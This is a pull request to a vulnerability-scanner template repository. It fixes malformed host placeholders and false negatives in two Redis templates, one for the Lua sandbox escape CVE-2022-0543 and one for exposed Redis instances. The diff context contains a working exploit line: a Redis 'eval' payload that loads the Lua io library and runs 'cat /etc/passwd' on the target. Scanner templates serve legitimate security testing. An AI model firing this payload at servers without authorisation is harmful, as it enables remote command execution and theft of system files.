### PR TITLE
Fix false negatives and typos in Redis CVE-2022-0543.yaml and exposed…

### DIFF
--- a/network/cves/2022/CVE-2022-0543.yaml
+++ b/network/cves/2022/CVE-2022-0543.yaml
@@ -5,10 +5,7 @@ info:
   author: dwisiswant0
   severity: critical
   description: |
-    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
-    vulnerability was introduced by Debian and Ubuntu Redis packages that
-    insufficiently sanitized the Lua environment. The maintainers failed to
-    disable the package interface, allowing attackers to load arbitrary libraries.
+    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
   reference:
     - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
     - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
@@ -28,6 +25,7 @@ info:
     shodan-query: redis_version
     vendor: redis
   tags: cve,cve2022,network,redis,unauth,rce,kev
+
 tcp:
   - host:
       - "{{Hostname}}"
@@ -37,6 +35,7 @@ tcp:
     inputs:
       - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
     read-size: 64
+
     matchers:
       - type: regex
         regex:

--- a/network/cves/2022/CVE-2022-0543.yaml
+++ b/network/cves/2022/CVE-2022-0543.yaml
@@ -30,7 +30,8 @@ info:
   tags: cve,cve2022,network,redis,unauth,rce,kev
 tcp:
   - host:
-      - "tls://{Hostname}}"
+      - "{{Hostname}}"
+      - "tls://{{Hostname}}"
     port: 6380
 
     inputs:

--- a/network/exposures/exposed-redis.yaml
+++ b/network/exposures/exposed-redis.yaml
@@ -20,7 +20,8 @@ tcp:
       - data: "info\r\nquit\r\n"
 
     host:
-      - "tls://{Hostname}}"
+      - "{{Hostname}}"
+      - "tls://{{Hostname}}"
     port: 6380
     read-size: 2048
 


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2022-0543.yaml / exposed-redis.yaml
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

After the update which introduced the `port` key, some hosts were removed from both these templates, the one remaining being `"tls://{Hostname}}"` which was missing a `{`. Moreover, without the plain `{{Hostname}}` the templates give false negatives on some targets. (We tested on some of ours, if you'd like to verify on them as well, we can talk privately).

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)